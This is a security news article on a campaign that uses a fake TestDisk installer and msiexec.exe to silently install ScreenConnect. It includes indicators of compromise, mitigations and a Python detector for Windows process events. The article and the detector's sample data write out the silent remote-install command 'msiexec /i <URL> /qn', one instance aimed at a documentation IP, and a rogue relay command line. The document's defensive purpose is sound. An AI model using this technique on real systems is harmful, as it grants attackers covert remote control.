Trojanized TestDisk Installer Exploits Microsoft Binary to Deploy ScreenConnect Malware
Cybersecurity researchers have uncovered a malware campaign in which attackers distribute a trojanized version of the open-source data recovery tool TestDisk to quietly deploy the remote access tool ScreenConnect on victims’ systems. The campaign abuses a legitimate, signed Microsoft binary to slip past security defenses, an example of the supply chain-style tactics now aimed at both individuals and enterprises.
How the Attack Works
The campaign begins with a fake TestDisk installer, typically hosted on compromised websites or distributed through phishing emails. Once executed, the installer drops a payload that invokes msiexec.exe, the trusted Windows Installer binary used for installing MSI packages, to silently download and install a modified version of ScreenConnect, a legitimate remote support tool frequently abused by threat actors for persistent access. msiexec.exe accepts a URL as the package source, so a single command line of the form msiexec /i <URL> /qn is enough to fetch and install the package without any separate downloader.
Running the install through msiexec.exe is a living-off-the-land technique: the attacker relies on a signed, pre-installed system binary (a LoLBin) rather than dropping a custom loader, so the malicious activity blends in with normal system processes and evades detection by traditional antivirus and endpoint protection platforms that key on unknown executables.
According to analysis reported by SC Media, the trojanized installer mimics the genuine TestDisk interface to avoid suspicion while running malicious code in the background. The payload establishes communication with attacker-controlled servers, giving the operator full remote control of the infected machine and a foothold for data exfiltration and lateral movement within the network.
Why TestDisk and ScreenConnect?
TestDisk is widely used by IT professionals and forensic analysts for recovering lost partitions and repairing disk structures. Its legitimacy and frequent use in administrative environments make it an effective lure for targeted attacks. Similarly, ScreenConnect (now part of ConnectWise) is a trusted remote management tool, so its presence on a system may not immediately raise alarms, especially if users believe it was installed legitimately.
This combination allows attackers to operate under the radar for extended periods, increasing the risk of data theft, credential harvesting, and ransomware deployment.
Indicators of Compromise (IoCs)
Security teams should monitor for the following signs of infection:
- Unexpected execution of TestDisk.exe from non-standard locations (e.g., %Temp%, %AppData%).
- msiexec.exe initiating network connections to unfamiliar domains or IP addresses, or launched with a remote URL as its package source.
- Presence of ScreenConnect client components (ScreenConnect.Client.exe, elmgine.dll) without corresponding admin approval.
- Unusual outbound traffic on ports 80, 443, or 8041, the ports ScreenConnect relays commonly use. Ports 80 and 443 are noisy on their own, so correlate the connection with the originating process and destination rather than alerting on the port alone.
Organizations are advised to enforce application control policies, restrict msiexec.exe so it can only install packages from trusted, local sources rather than arbitrary URLs, and monitor for anomalous use of LoLBins.
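The indicators above translate directly into checks over process-creation telemetry. The following is an added example (not code from the article, SC Media, or any vendor) that scores Windows Security 4688 records with command-line auditing enabled; the field names follow that event, the sample records are constructed for the example, and the trusted-parent list, approved relay host, and the assumption that the ScreenConnect client carries its relay host in an h= query parameter on its command line are placeholders to be verified against your own deployment.

```python
"""Process-creation triage for the TestDisk -> msiexec.exe -> ScreenConnect chain.

Added example, not code from the article or from any vendor. It scores
Windows Security 4688 (process creation) records that have command-line
auditing enabled; field names follow that event, the sample records are
constructed, and the allowlists below are placeholders for your environment.
"""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs

# Assumed deployment tooling allowed to run silent MSI installs (extend to yours).
TRUSTED_INSTALL_PARENTS = {"ccmexec.exe", "services.exe"}
# Assumed approved ScreenConnect relay host(s) for this organisation.
APPROVED_RELAYS = {"support.corp.example"}
# Directory fragments that mark user-writable staging areas (%Temp%, %AppData%, ...).
USER_WRITABLE_DIRS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
QUIET_RE = re.compile(r"(?:^|\s)/(?:q[nbrf]?|quiet|passive)\b", re.IGNORECASE)

# Constructed sample events: 1, 4 and 6 are benign; 2, 3 and 5 are the chain described above.
SAMPLE_EVENTS = [
    {"id": 1, "NewProcessName": r"C:\Program Files\TestDisk-7.2\testdisk_win.exe",
     "CommandLine": r'"C:\Program Files\TestDisk-7.2\testdisk_win.exe"',
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"id": 2, "NewProcessName": r"C:\Users\alice\AppData\Local\Temp\TestDisk.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\TestDisk.exe"',
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    {"id": 3, "NewProcessName": r"C:\Windows\System32\msiexec.exe",
     # 198.51.100.0/24 is a documentation range; the URL is made up for the example.
     "CommandLine": "msiexec.exe /i http://198.51.100.23/update.msi /qn",
     "ParentProcessName": r"C:\Users\alice\AppData\Local\Temp\TestDisk.exe"},
    {"id": 4, "NewProcessName": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Windows\ccmcache\a1\7zip.msi /qn",
     "ParentProcessName": r"C:\Windows\CCM\CcmExec.exe"},
    {"id": 5, "NewProcessName": r"C:\Program Files (x86)\ScreenConnect Client (d3adb33f)\ScreenConnect.ClientService.exe",
     "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (d3adb33f)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.example.net&p=8041&s=6f1c2b8a&k=BgIAAACkAAA"',
     "ParentProcessName": r"C:\Windows\System32\services.exe"},
    {"id": 6, "NewProcessName": r"C:\Program Files (x86)\ScreenConnect Client (0badcafe)\ScreenConnect.ClientService.exe",
     "CommandLine": r'"C:\Program Files (x86)\ScreenConnect Client (0badcafe)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=support.corp.example&p=443&s=1a2b3c4d&k=BgIAAACkAAA"',
     "ParentProcessName": r"C:\Windows\System32\services.exe"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def relay_from_cmdline(cmd: str) -> Tuple[Optional[str], Optional[str]]:
    """Return (host, port) the ScreenConnect client was told to connect to.

    Assumes the client's command line carries its connection parameters as a
    query string ("?e=...&h=<relay host>&p=<port>..."); verify on your own installs.
    """
    m = re.search(r'\?([^"\s]+)', cmd)
    if not m:
        return None, None
    params = parse_qs(m.group(1))
    return params.get("h", [None])[0], params.get("p", [None])[0]


def check_event(ev: Dict[str, object]) -> List[str]:
    """Apply the article's indicators to one 4688-style record; return the names of the hits."""
    findings: List[str] = []
    path = str(ev["NewProcessName"]).lower()
    name = _basename(path)
    cmd = str(ev.get("CommandLine", ""))
    parent = _basename(str(ev.get("ParentProcessName", "")))

    # IoC 1: TestDisk started from a %Temp%/%AppData%-style user-writable location.
    if name.startswith("testdisk") and any(d in path for d in USER_WRITABLE_DIRS):
        findings.append("testdisk_from_user_writable_path")

    # IoC 2: msiexec.exe fetching its package over HTTP(S), or installing silently
    # on behalf of a parent that is not a known deployment agent.
    if name == "msiexec.exe":
        if URL_RE.search(cmd):
            findings.append("msiexec_remote_package")
        if QUIET_RE.search(cmd) and parent not in TRUSTED_INSTALL_PARENTS:
            findings.append("msiexec_quiet_install_untrusted_parent")

    # IoC 3: a ScreenConnect client pointed at a relay nobody approved.
    if name.startswith("screenconnect."):
        host, _port = relay_from_cmdline(cmd)
        if host is None:
            findings.append("screenconnect_client_unparsed_relay")
        elif host.lower() not in APPROVED_RELAYS:
            findings.append("screenconnect_unapproved_relay")
    return findings


def scan(events) -> Dict[int, List[str]]:
    """Map event id -> findings for every event that triggered at least one check."""
    return {int(ev["id"]): f for ev in events if (f := check_event(ev))}


if __name__ == "__main__":
    for eid, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```

The parent-process check is what separates a legitimate silent install pushed by a deployment agent (event 4) from the same msiexec.exe command line spawned by a user-land installer (event 3); without command-line auditing, 4688 records carry neither the URL nor the quiet flag, which is why the logging recommendation below matters.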
Defensive Recommendations
To mitigate this threat, experts recommend the following:
- Download software only from official vendor websites or trusted repositories.
- Implement application allowlisting to block unauthorized executables.
- Enable logging and monitoring for Windows process creation (Security Event ID 4688) with command-line auditing turned on, or the equivalent Sysmon Event ID 1, so that msiexec.exe arguments such as a remote package URL are visible to analysts.
- Use endpoint detection and response (EDR) tools capable of detecting LoLBin abuse.
- Educate users about the risks of phishing and software from unverified sources.
Organizations should also consider blocking known malicious domains and IP addresses associated with this campaign through firewall and DNS filtering policies.
Broader Implications
This incident underscores a growing trend in cybercrime: the abuse of legitimate tools and binaries to conduct stealthy attacks. As organizations improve their ability to detect malware signatures, attackers increasingly rely on living-off-the-land techniques to bypass defenses.
The use of trusted open-source tools like TestDisk as attack vectors also raises concerns about the security of software distribution channels. While TestDisk itself remains safe when obtained from its official site (cgsecurity.org), the incident highlights the need for vigilance even with well-known, reputable utilities.
Conclusion
The trojanized TestDisk installer campaign demonstrates how threat actors continue to combine social engineering, trusted software, and legitimate system binaries to evade detection. By abusing msiexec.exe to deploy ScreenConnect, attackers gain persistent access while minimizing their footprint.
Users and administrators must remain vigilant, verify software sources, and employ layered defenses to detect and prevent such abuse of legitimate tools. As LoLBin tactics evolve, proactive monitoring and application control will be essential components of a resilient cybersecurity strategy.
Frequently Asked Questions
Is the official TestDisk tool compromised?
No. The legitimate TestDisk application from cgsecurity.org is safe. The threat involves fake installers distributed through unofficial channels.
Can antivirus software detect this threat?
Some advanced antivirus and EDR solutions may detect the malicious behavior, especially if they monitor for misuse of msiexec.exe or unusual ScreenConnect activity. However, signature-based detection alone may miss the trojanized installer.
What should I do if I suspect infection?
Isolate the affected system, run a full scan with updated endpoint security tools, and review process execution logs for signs of msiexec.exe abuse or unauthorized ScreenConnect components. Consult your IT or security team for further investigation.